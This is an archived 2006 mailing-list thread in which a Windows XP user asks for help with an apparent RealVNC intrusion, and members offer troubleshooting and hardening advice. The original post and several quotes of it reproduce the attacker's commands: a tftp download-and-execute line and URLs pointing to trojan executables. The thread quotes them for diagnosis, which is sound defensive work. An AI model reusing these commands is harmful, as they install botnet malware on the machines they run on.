Exact match. Not showing close matches.
PICList
Thread
'[EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BA'
2006\10\05@144300
by
Carey Fisher - NCS
Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
http://homepage.my-place.us/system.exe
Well, I immediately disabled the network connection and I don't think this program was executed.
Then I scrolled through the Run window and found the following 3 lines:
cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
http://kruma.us/vn.exe
%SYSTEMROOT%\SYSTEM32\CMD.EXE
This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
Thanks,
Carey
2006\10\05@150158
by
Orin Eman
|
On 10/5/06, Carey Fisher - NCS <spam_OUTcareyfisherTakeThisOuT
ncsradio.com> wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
Some variant of:
http://www.sophos.com/security/analyses/trojtofgerb.html ?
Try a free trial of PCdefense... http://www.laplink.com/pcdefense/
Run all the scans as you appear to be infected with something.
Orin.
2006\10\05@151500
by
Peter Bindels
|
Sounds like:
http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html
BTW, tried the IRC server, it's down. Sounds like an old botnet.
I've also stumbled across (and misplaced) a website that claimed it
could come from using a web browser that supports VBS.
Regards & good luck,
Peter
On 05/10/06, Carey Fisher - NCS <.....careyfisherKILLspam
@spam@ncsradio.com> wrote:
{Quote hidden}> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
>
http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
>
http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
>
> Thanks,
> Carey
> -
2006\10\05@153458
by
James Newtons Massmind
Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in
case you don't know, that windows activates when it starts, and is an easy
way for malware to get itself started again when you reboot. Since this
means the malware does not need to modify an existing .exe to get started,
it will NOT appear on most anti-virus scans. Adaware does a better job of
catching these automatically, but I find that getting to know the autoruns
is a better way of combating the problem.
This has more info on your bad .exe
fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.h
tml
"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most
common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"
Each of those may be listed in your autoruns.
Please DO keep us posted? I'm very interested to know what you find.
---
James.
> {Original Message removed}
2006\10\05@174705
by
Philip Pemberton
|
Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ]
ClamAV says:
philpem@wolf:~/MALWARE$ clamscan system_exe
system_exe: Trojan.Mybot-1445 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 71517
Engine version: 0.88.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.32 MB
Time: 46.696 sec (0 m 46 s)
Virusdata from Sophos is here:
http://www.sophos.com/security/analyses/w32rbotadh.html
If you don't have an antivirus installed, go find a clean machine, grab AVG
(from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
get the firewall enabled and block *everything*. Go to
http://housecall.trendmicro.com/ and scan your system. Let it remove any
viruses it finds. Then install AVG.
Looks like pretty much your standard password stealing IRC botnet building
trojan/worm. If I get sufficiently bored, I'll throw it into a VMware sandbox
and pull it to bits with the old IDA freeware release and OllyDebug.
> This really surprised me since I've taken a lot of measures to secure my system
including a program that won't let new programs run without my permission.
This is why the first one didn't run. I also run antivirus, I monitor the
router/firewall with Wallwatcher, and I block all inbound ports except a
couple (Skype, FreeVNC).
I notice you're using Outlook Express (the X-Mailer header told me <grin>).
FWIW, there are tons of exploits that allow remote code execution in OE. The
old double-extension bug, buffer overflows, the list goes on. I'd switch to
Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
of your mail and settings from OE).
What antivirus are you using?
I guess you've got a perimeter firewall on the router. Any firewall software
on the machine itself (e.g. ZoneAlarm)?
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
I wonder if someone exploited VNC... What's your VNC password like - all
lowercase and less than 8 characters maybe? And no numbers or symbols? :)
I have my network set up so that you have to SSH in (and use a public key to
authenticate yourself with the server), then you have to tunnel from the
server to the machines inside the network. There are only a few ports open on
the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
from the Internet, I don't add a port-forward, I use an SSH tunnel.
--
Phil. | (\_/) This is Bunny. Copy and paste Bunny
piclist
KILLspamphilpem.me.uk | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/ | (")_(") world domination.
2006\10\05@193823
by
Carey Fisher
Thanks for the replies everyone... comments below...
Philip Pemberton wrote:
> Carey Fisher - NCS wrote:
>
>> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>>
>> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ]
>>
>
> ClamAV says:
> philpem@wolf:~/MALWARE$ clamscan system_exe
> system_exe: Trojan.Mybot-1445 FOUND
> ...
>
....
> If you don't have an antivirus installed, go find a clean machine, grab AVG
> (from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
> get the firewall enabled and block *everything*. Go to
> http://housecall.trendmicro.com/ and scan your system. Let it remove any
> viruses it finds. Then install AVG.
>
Yeah, I use AVG and keep it up to date. I also used McAfee Virus Scan
and nothing can find a virus on that machine.
> I notice you're using Outlook Express (the X-Mailer header told me <grin>).
> FWIW, there are tons of exploits that allow remote code execution in OE. The
> old double-extension bug, buffer overflows, the list goes on. I'd switch to
> Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
> of your mail and settings from OE).
>
I have Thunderbird on all but that one machine - in fact I'm using
Thunderbird now. Maybe I should switch that last machine:)
> What antivirus are you using?
> I guess you've got a perimeter firewall on the router. Any firewall software
> on the machine itself (e.g. ZoneAlarm)?
>
Just using the router for a firewall. I've scanned it from outside and
no ports are open except VNC & SKYPE. Also, I've set the DHCP on the
DSL Modem to reset every hour.
>
>> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
>>
>
> I wonder if someone exploited VNC... What's your VNC password like - all
> lowercase and less than 8 characters maybe? And no numbers or symbols? :)
>
That's what I'm wondering too... my pw is >8 char and numbers and letters.
> I have my network set up so that you have to SSH in (and use a public key to
> authenticate yourself with the server), then you have to tunnel from the
> server to the machines inside the network. There are only a few ports open on
> the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
> from the Internet, I don't add a port-forward, I use an SSH tunnel.
>
I also run StartUpMonitor so any new programs can't get stuck in as
autoruns.
I'll run Ethereal a while and see what I catch. Maybe set up a
different machine as a "honeypot".
Carey
2006\10\05@195417
by
Gerhard Fiedler
Carey Fisher wrote:
> Just using the router for a firewall.
One reason for using a local firewall is to have better control over the
outgoing connections from your machine.
> I've scanned it from outside and no ports are open except VNC & SKYPE.
What ports do you open for Skype? I use it, and never opened any ports for
it.
> Also, I've set the DHCP on the DSL Modem to reset every hour.
Which doesn't help if you have a trojan on your machine...
I'm not sure whether this is too obvious, but do you know all processes
that run on your machine?
Gerhard
2006\10\05@204725
by
Carey Fisher
Gerhard Fiedler wrote:
> Carey Fisher wrote:
>
>> Just using the router for a firewall.
>>
>
> One reason for using a local firewall is to have better control over the
> outgoing connections from your machine.
>
>
I do have the XP firewall turned on but no third party ones. And
Wallwatcher has never reported a blocked outbound connection...
hmmmm...blocked....
what about the ones that are not blocked...
{Quote hidden}>> I've scanned it from outside and no ports are open except VNC & SKYPE.
>>
>
> What ports do you open for Skype? I use it, and never opened any ports for
> it.
>
>
>> Also, I've set the DHCP on the DSL Modem to reset every hour.
>>
>
> Which doesn't help if you have a trojan on your machine...
>
> I'm not sure whether this is too obvious, but do you know all processes
> that run on your machine?
>
I have looked at the process list and looked up ones I didn't recognize
- nothing funny there.
Oh - another clue - never happens when I'm logged out of XP and never
happens when I disable the network connection on the machine. I also
don't normally run with Admin privileges.
> Gerhard
>
Carey
2006\10\06@023355
by
Ruben Jönsson
> Gerhard Fiedler wrote:
> > Carey Fisher wrote:
> >
> >> Just using the router for a firewall.
> >>
> >
> > One reason for using a local firewall is to have better control over the
> > outgoing connections from your machine.
> >
> >
> I do have the XP firewall turned on but no third party ones. And
> Wallwatcher has never reported a blocked outbound connection...
> hmmmm...blocked....
> what about the ones that are not blocked...
The XP firewall does not block outgoing traffic. The new Vista and Windiws
Server firewall will.
/Ruben
==============================
Ruben Jönsson
AB Liros Electronic
Box 9124, 200 39 Malmö, Sweden
TEL INT +46 40142078
FAX INT +46 40947388
.....rubenKILLspam
.....pp.sbbs.se
==============================
2006\10\06@073317
by
Gerhard Fiedler
Carey Fisher wrote:
> Oh - another clue - never happens when I'm logged out of XP [...]
AFAIK it's not possible to insert into the keyboard buffer (which seems to
be what is happening) when you're not logged in or while the session is
locked. Which is good (in this case) and can be a pain (when trying to
automate a GUI application with something like AutoIt3 and wanting it to
work while the session is locked).
> [...] and never happens when I disable the network connection on the
> machine.
Seems you do have an infection. Strange though that no virus scanner
catches it. Maybe you try to make a boot CD (look for BartPE for example)
with a few scanners and run them from the boot CD.
Gerhard
2006\10\06@091019
by
Herbert Graf
|
On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
I'm no expert, but a google search on wfudpgemr.exe resulted in the
following hit:
http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc
> Anybody know anything about any of these apparent attacks.
Not really, haven't been paying much attention.
> Any suggestions to prevent this particular exploit (START/Run)?
Perhaps a little extreme for most, but: run a different OS. MacOS isn't
bad, I run Linux. TTYL
2006\10\06@122141
by
Orin Eman
On 10/6/06, Gerhard Fiedler <EraseMElistsspam_OUT
TakeThisOuTconnectionbrazil.com> wrote:
> Carey Fisher wrote:
>
> > Oh - another clue - never happens when I'm logged out of XP [...]
>
> AFAIK it's not possible to insert into the keyboard buffer (which seems to
> be what is happening) when you're not logged in or while the session is
> locked. Which is good (in this case) and can be a pain (when trying to
> automate a GUI application with something like AutoIt3 and wanting it to
> work while the session is locked).
It is possible. Quite easy by inserting an upper filter driver abover
the keyoard driver. It's done by the remote control applications. It
does need admin rights to install and a reboot. The really bad thing
is if you remove the driver but don't fix the registry, you lose your
keyboard!
Orin.
2006\10\06@132157
by
James Newton
|
> Oh - another clue - never happens when I'm logged out of XP
> and never happens when I disable the network connection on
> the machine. I also don't normally run with Admin privileges.
The malware may be starting in your logon script.
http://www.windowsnetworking.com/articles_tutorials/wxpplogs.html
Again, autorun from sysinternals (a free utility) will list all possible
sources for the startup of any program. Finding and removing the entry for
the malware will stop it from gaining control of the system.
http://www.sysinternals.com/Utilities/Autoruns.html
Note that there are many strange looking things that DO need to start, and
you must be careful. Autoruns allows you to filter OUT Microsoft signed
programs, and it has a nice feature to google for the program name which
will generally allow you to see what it does and why.
Be sure to run it after booting in safemode so that they program will not be
able to re-install its self in the run list after you remove it.
---
James.
2006\10\06@150040
by
Paul Hutchinson
2006\10\07@084442
by
Howard Winter
Carey,
On Thu, 05 Oct 2006 19:38:24 -0400, Carey Fisher wrote:
>...
> Just using the router for a firewall. I've scanned it from outside and
> no ports are open except VNC & SKYPE.
The last time I tried to find out which port(s) Skype uses, I was unable to (they said something like "anything over 1024", which isn't very good for
filtering!). Which ones do you use/allow through for Skype?
Cheers,
Howard Winter
St.Albans, England
2006\10\07@090552
by
peter green
>
> The last time I tried to find out which port(s) Skype uses, I was
> unable to (they said something like "anything over 1024", which
> isn't very good for
> filtering!). Which ones do you use/allow through for Skype?
i don't use skype because i disaprove of their policies of raping other
users bandwidth to provide service to those on firewalled networks.
if you must use it i strongly advise against forwarding any ports for it
(even if you find out what listen port it uses) as this may allow your copy
of skype to become a supernode and suck up insane bandwidth (saturating a
100megabit connection is NOT unheared of).
2006\10\07@092402
by
Gerhard Fiedler
peter green wrote:
> Howard Winter wrote:
>> The last time I tried to find out which port(s) Skype uses, I was unable
>> to (they said something like "anything over 1024", which isn't very
>> good for filtering!). Which ones do you use/allow through for Skype?
FWIW, I'm behind an SMC firewall and I don't forward anything for Skype. It
seems to work with outbound connections only.
> i don't use skype because i disaprove of their policies of raping other
> users bandwidth to provide service to those on firewalled networks.
How's that? Do you have more detailed information?
Gerhard
2006\10\09@011824
by
Frank Niu
How is this matter going? Actually I encountered exact the same virus/worm
and don't know how to get rid of it.
Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
sure it has something to do with VNC: This issue occurs with my 3 machines
with VNC server installed every a few minutes intermittently. After I closed
VNC server, seems it won't occur for now.
Any final solution for this?
--
View this message in context: www.nabble.com/-EE-%3A-WINXP-Malware-Attacks--CAUTION---POSSIBLE-BAD-LINKS-LISTED-tf2391073.html#a6701146
Sent from the MicroControllers - PIC mailing list archive at Nabble.com.
2006\10\09@064617
by
Gerhard Fiedler
Frank Niu wrote:
> I'm pretty sure it has something to do with VNC: This issue occurs with
> my 3 machines with VNC server installed every a few minutes
> intermittently. After I closed VNC server, seems it won't occur for now.
>
> Any final solution for this?
Going with the standard comment "use Linux": use NetMeeting :)
Wouldn't expose it on the Internet, but on a LAN behind a firewall I don't
see a problem.
Gerhard
2006\10\09@093647
by
Carey Fisher
Frank Niu wrote:
> How is this matter going? Actually I encountered exact the same virus/worm
> and don't know how to get rid of it.
>
>
I've scanned with multiple virus scanners including AVG and Norton.
I've run Adaware and Spybot and I've
found nothing at all.
Also, still no intrusions with any one or more of the following true:
VNC stopped
network disconnected
logged out
> Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> sure it has something to do with VNC: This issue occurs with my 3 machines
> with VNC server installed every a few minutes intermittently. After I closed
> VNC server, seems it won't occur for now.
>
> Any final solution for this?
> pe a
>
I'm convinced there is no virus in the machine and it seems someone is
trying to (manually?) type a command in the Start/Run box as if they are
sitting in front of the computer.
So, that sorta leaves VNC except I have it running as a Service which
means if someone was using VNC they could still use it when all users
are logged out except they can't login cause I have a strong password.
I have 3 machines with VNC but only one is forwarded to from the
router. That's the one that's being compromised.
Now I'm investigating my Wi-Fi nodes.
Carey
2006\10\09@123414
by
Orin Eman
|
On 10/9/06, Carey Fisher <@spam@careyfisherKILLspam
ncsradio.com> wrote:
{Quote hidden}>
> Frank Niu wrote:
> > How is this matter going? Actually I encountered exact the same virus/worm
> > and don't know how to get rid of it.
> >
> >
> I've scanned with multiple virus scanners including AVG and Norton.
> I've run Adaware and Spybot and I've
> found nothing at all.
>
> Also, still no intrusions with any one or more of the following true:
> VNC stopped
> network disconnected
> logged out
>
> > Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> > sure it has something to do with VNC: This issue occurs with my 3 machines
> > with VNC server installed every a few minutes intermittently. After I closed
> > VNC server, seems it won't occur for now.
> >
> > Any final solution for this?
> > pe a
> >
> I'm convinced there is no virus in the machine and it seems someone is
> trying to (manually?) type a command in the Start/Run box as if they are
> sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a Service which
> means if someone was using VNC they could still use it when all users
> are logged out except they can't login cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from the
> router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
VNC's password encryption _wasn't_ last time I looked. If you can
sniff the network, it doesn't matter how strong the password is.
As for WiFi, what encryption are you using? WEP isn't secure. I've
deliberately sniffed my own network with kismet and run aircrack. It
took a couple of GB of data, but it found the key.
Orin.
2006\10\09@171709
by
Dave Wheeler
A google for VNC vulnerability leads to a mass of undocumented features :-)
Most have been fixed in the latest versions
Dave
2006\10\09@183733
by
James Newtons Massmind
> I'm convinced there is no virus in the machine and it seems
> someone is trying to (manually?) type a command in the
> Start/Run box as if they are sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a
> Service which means if someone was using VNC they could still
> use it when all users are logged out except they can't login
> cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from
> the router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey
Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing
the glue that holds the internet together) fired up and set to look for that
string and log any packets containing it.
If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
looking for a VPN solution and VNC was on my list to check.
---
James.
2006\10\09@192655
by
Gerhard Fiedler
James Newtons Massmind wrote:
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.
Does VNC include a VPN? I thought it was a remote control server/client
application.
I'm using an SMC Barricade router that has a VPN server built-in. That's
quite convenient and really simple to set up.
BTW, running VNC over a VPN could be a workaround for Carey. This way the
VNC traffic is not exposed directly to the Internet (or the wireless LAN).
Gerhard
2006\10\09@194459
by
Bob Blick
>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to
> start
> looking for a VPN solution and VNC was on my list to check.
Hi James,
VNC is not VPN - but if you are using it on the internet, you should use
it inside a VPN or SSH.
Another remote client/server you might look at is NX (No Machine). It uses
less bandwidth but is much more processor intensive than VNC. And is not
open source(although there are free beer versions). It uses SSH by
default, I believe. (I only use these things locally behind a firewall, so
I don't pay much attention to that part of it).
Cheerful regards,
Bob
2006\10\09@235059
by
Rich Mulvey
|
James Newtons Massmind wrote:
{Quote hidden}>> I'm convinced there is no virus in the machine and it seems
>> someone is trying to (manually?) type a command in the
>> Start/Run box as if they are sitting in front of the computer.
>>
>> So, that sorta leaves VNC except I have it running as a
>> Service which means if someone was using VNC they could still
>> use it when all users are logged out except they can't login
>> cause I have a strong password.
>> I have 3 machines with VNC but only one is forwarded to from
>> the router. That's the one that's being compromised.
>>
>> Now I'm investigating my Wi-Fi nodes.
>>
>> Carey
>>
>
>
> Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing
> the glue that holds the internet together) fired up and set to look for that
> string and log any packets containing it.
>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.
>
>
>
One thing to be aware of is that "VNC" is really just a reference to
a protocol, and not a particular application. There are literally
dozens of different implementations of VNC - some commercial, some open
source, etc. Some have holes big enough to drive a truck through, while
others are reasonably secure.
That being said, there's no way in heck I'd ever use any VNC
application that wasn't being tunneled over a VPN or SSH.
- Rich
2006\10\10@004747
by
Orin Eman
On 10/9/06, Rich Mulvey <KILLspamrichKILLspam
mulveyfamily.com> wrote:
> One thing to be aware of is that "VNC" is really just a reference to
> a protocol, and not a particular application. There are literally
> dozens of different implementations of VNC - some commercial, some open
> source, etc. Some have holes big enough to drive a truck through, while
> others are reasonably secure.
>
> That being said, there's no way in heck I'd ever use any VNC
> application that wasn't being tunneled over a VPN or SSH.
That's safest...
If you want a (rather old now) SSL enabled VNC, it's available from:
http://www.laplink.com/products/vnc/overview.asp
Orin.
2006\10\10@143658
by
James Newtons Massmind
> Hi James,
>
> VNC is not VPN - but if you are using it on the internet, you
> should use it inside a VPN or SSH.
I was suffering from confabulation. ;o)
> Another remote client/server you might look at is NX (No
> Machine). It uses less bandwidth but is much more processor
> intensive than VNC. And is not open source(although there are
> free beer versions). It uses SSH by default, I believe. (I
> only use these things locally behind a firewall, so I don't
> pay much attention to that part of it).
Thanks, I'll check it out.
---
James.
2006\10\10@192508
by
Carey Fisher
Orin Eman wrote:
{Quote hidden}> On 10/9/06, Rich Mulvey <
RemoveMErichTakeThisOuT
mulveyfamily.com> wrote:
>
>> One thing to be aware of is that "VNC" is really just a reference to
>> a protocol, and not a particular application. There are literally
>> dozens of different implementations of VNC - some commercial, some open
>> source, etc. Some have holes big enough to drive a truck through, while
>> others are reasonably secure.
>>
>> That being said, there's no way in heck I'd ever use any VNC
>> application that wasn't being tunneled over a VPN or SSH.
>>
>
> That's safest...
>
> If you want a (rather old now) SSL enabled VNC, it's available from:
>
>
http://www.laplink.com/products/vnc/overview.asp
>
> Orin.
>
I understand what you guys are saying and I do have a VPN equipped
router at this location.
But I need (want?) to access the machine in question from nearly
anywhere and any machine
so I can't count on being able to setup a tunnel from just anywhere.
Maybe I should just run VNC over a VPN connection between here and the
one other place
I spend a lot of time. I can install a VPN router there.
BTW, I'm running RealVNC and my password is ............ at IP address
192.168.99.257
;)
Carey
2006\10\10@215014
by
Jake Anderson
|
Carey Fisher wrote:
{Quote hidden}> Orin Eman wrote:
>
>> On 10/9/06, Rich Mulvey <
spamBeGonerichspamBeGone
mulveyfamily.com> wrote:
>>
>>
>>> One thing to be aware of is that "VNC" is really just a reference to
>>> a protocol, and not a particular application. There are literally
>>> dozens of different implementations of VNC - some commercial, some open
>>> source, etc. Some have holes big enough to drive a truck through, while
>>> others are reasonably secure.
>>>
>>> That being said, there's no way in heck I'd ever use any VNC
>>> application that wasn't being tunneled over a VPN or SSH.
>>>
>>>
>> That's safest...
>>
>> If you want a (rather old now) SSL enabled VNC, it's available from:
>>
>> www.laplink.com/products/vnc/overview.asp
>>
>> Orin.
>>
>>
>
> I understand what you guys are saying and I do have a VPN equipped
> router at this location.
> But I need (want?) to access the machine in question from nearly
> anywhere and any machine
> so I can't count on being able to setup a tunnel from just anywhere.
> Maybe I should just run VNC over a VPN connection between here and the
> one other place
> I spend a lot of time. I can install a VPN router there.
> BTW, I'm running RealVNC and my password is ............ at IP address
> 192.168.99.257
> ;)
> Carey
>
>
perhaps enable web managment of your router (as in from outside) with a
good password.
then allow port forwards from the machine your on when you want to use
it? rather than from the whole net the whole time.
Otherwise get a "real" firewall (linux style) and put a port knock thing
on (doorman) that will allow you in.
2006\10\10@220752
by
Orin Eman
|
On 10/10/06, Carey Fisher <TakeThisOuTcareyfisherEraseME
spam_OUTncsradio.com> wrote:
{Quote hidden}> Orin Eman wrote:
> > On 10/9/06, Rich Mulvey <
RemoveMErich
TakeThisOuTmulveyfamily.com> wrote:
> >
> >> One thing to be aware of is that "VNC" is really just a reference to
> >> a protocol, and not a particular application. There are literally
> >> dozens of different implementations of VNC - some commercial, some open
> >> source, etc. Some have holes big enough to drive a truck through, while
> >> others are reasonably secure.
> >>
> >> That being said, there's no way in heck I'd ever use any VNC
> >> application that wasn't being tunneled over a VPN or SSH.
> >>
> >
> > That's safest...
> >
> > If you want a (rather old now) SSL enabled VNC, it's available from:
> >
> > www.laplink.com/products/vnc/overview.asp
> >
> > Orin.
> >
>
> I understand what you guys are saying and I do have a VPN equipped
> router at this location.
> But I need (want?) to access the machine in question from nearly
> anywhere and any machine
That's what Laplink Everywhere does... it's not free though. It uses
a Java VNC viewer to try to cover as many client operating systems as
possible - if you have access to a Java enabled browser, you can
access your VNC server.
I don't recall if the open source Java VNC viewer that's available
from the above link will make a direct connection to a VNC server or
not (if not, the change would be trivial), but it will do SSL as will
the server I originally mentioned.
Orin.
2006\10\10@221927
by
Gerhard Fiedler
Carey Fisher wrote:
> I understand what you guys are saying and I do have a VPN equipped router
> at this location. But I need (want?) to access the machine in question
> from nearly anywhere and any machine so I can't count on being able to
> setup a tunnel from just anywhere. Maybe I should just run VNC over a
> VPN connection between here and the one other place I spend a lot of
> time. I can install a VPN router there.
A PPTP connection is set up pretty quickly on any recent Windows PC, and
doesn't need a special router. (Most let it pass, for one connection at
least.)
Gerhard
2006\10\11@030943
by
Orin Eman
On 10/10/06, Gerhard Fiedler <listsEraseME
.....connectionbrazil.com> wrote:
> Carey Fisher wrote:
>
> > I understand what you guys are saying and I do have a VPN equipped router
> > at this location. But I need (want?) to access the machine in question
> > from nearly anywhere and any machine so I can't count on being able to
> > setup a tunnel from just anywhere. Maybe I should just run VNC over a
> > VPN connection between here and the one other place I spend a lot of
> > time. I can install a VPN router there.
>
> A PPTP connection is set up pretty quickly on any recent Windows PC, and
> doesn't need a special router. (Most let it pass, for one connection at
> least.)
Whether it works or not is a different matter...
Sorry for the rant, but my copy of XP at home can't handle a bad
packet during the PPTP startup and just sits and sulks. A Win2k
virtual machine under Vmware on Gentoo Linux however works fine...
Orin.
2006\10\11@032935
by
Philip Pemberton
Orin Eman wrote:
> That's what Laplink Everywhere does... it's not free though. It uses
> a Java VNC viewer to try to cover as many client operating systems as
> possible - if you have access to a Java enabled browser, you can
> access your VNC server.
TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
5800.
--
Phil. | (\_/) This is Bunny. Copy and paste Bunny
EraseMEpiclist
philpem.me.uk | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/ | (")_(") world domination.
2006\10\11@052328
by
Frank Niu
|
I got a announcement about this issue. It is indeed a VNC-related security
problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)
**********************************
There is a known exposure in some versions of the popular program VNC by
which an attacker can get past the password protection and compromise the
system. It was found in the "RealVNC" version and an upgrade which fixes
this exposure is available. Other versions of VNC may or may not be
affected.
Recently, a program which exploits this vulnerability has been spotted in
the wild. The corporate threat team is aware of this and has set the
corporate IPS systems to block this worm when spotted and to issue service
desk tickets against the source address (if internal). At this time,
there is no indication that a "CIO Patch Override" will be needed.
If you currently use RealVNC to remotely access your systems please check
that you have the latest build of your version of RealVNC. During the
recent Digital Threat and Risk Assessment it was discovered that older
builds of RealVNC has vulnerabilities that can be (and were) exploited to
gain unauthorized access to systems.
You will need to upgrade your version of RealVNC if you have a build date
earlier then MAY 2006. RealVNC upgrades are available at
http://www.realvnc.com/upgrade.html
*********************************
Carey Fisher - NCS wrote:
{Quote hidden}>
>
> Frank Niu wrote:
>> How is this matter going? Actually I encountered exact the same
>> virus/worm
>> and don't know how to get rid of it.
>>
>>
> I've scanned with multiple virus scanners including AVG and Norton.
> I've run Adaware and Spybot and I've
> found nothing at all.
>
> Also, still no intrusions with any one or more of the following true:
> VNC stopped
> network disconnected
> logged out
>
>> Checked with sysinternal autorun.exe, found nothing suspicious. I'm
>> pretty
>> sure it has something to do with VNC: This issue occurs with my 3
>> machines
>> with VNC server installed every a few minutes intermittently. After I
>> closed
>> VNC server, seems it won't occur for now.
>>
>> Any final solution for this?
>> pe a
>>
> I'm convinced there is no virus in the machine and it seems someone is
> trying to (manually?) type a command in the Start/Run box as if they are
> sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a Service which
> means if someone was using VNC they could still use it when all users
> are logged out except they can't login cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from the
> router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey
> --
2006\10\11@064506
by
Bob Axtell
Frank Niu wrote:
> I got a announcement about this issue. It is indeed a VNC-related security
> problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)
>
> **********************************
> There is a known exposure in some versions of the popular program VNC by
> which an attacker can get past the password protection and compromise the
> system. It was found in the "RealVNC" version and an upgrade which fixes
> this exposure is available. Other versions of VNC may or may not be
> affected.
>
That's a very important catch, Frank. Thanks!
--Bob
{Quote hidden}> Recently, a program which exploits this vulnerability has been spotted in
> the wild. The corporate threat team is aware of this and has set the
> corporate IPS systems to block this worm when spotted and to issue service
> desk tickets against the source address (if internal). At this time,
> there is no indication that a "CIO Patch Override" will be needed.
>
>
> If you currently use RealVNC to remotely access your systems please check
> that you have the latest build of your version of RealVNC. During the
> recent Digital Threat and Risk Assessment it was discovered that older
> builds of RealVNC has vulnerabilities that can be (and were) exploited to
> gain unauthorized access to systems.
>
> You will need to upgrade your version of RealVNC if you have a build date
> earlier then MAY 2006. RealVNC upgrades are available at
>
http://www.realvnc.com/upgrade.html
>
> *********************************
>
>
> Carey Fisher - NCS wrote:
>
>> Frank Niu wrote:
>>
>>> How is this matter going? Actually I encountered exact the same
>>> virus/worm
>>> and don't know how to get rid of it.
>>>
>>>
>>>
>> I've scanned with multiple virus scanners including AVG and Norton.
>> I've run Adaware and Spybot and I've
